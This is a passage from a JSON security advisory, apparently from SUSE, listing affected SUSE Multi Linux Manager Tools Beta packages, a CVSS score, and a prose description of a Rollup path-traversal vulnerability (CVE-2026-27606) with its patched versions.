"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2026-25547"
},
{
"cve": "CVE-2026-27606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27606"
}
],
"notes": [
{
"category": "general",
"text": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
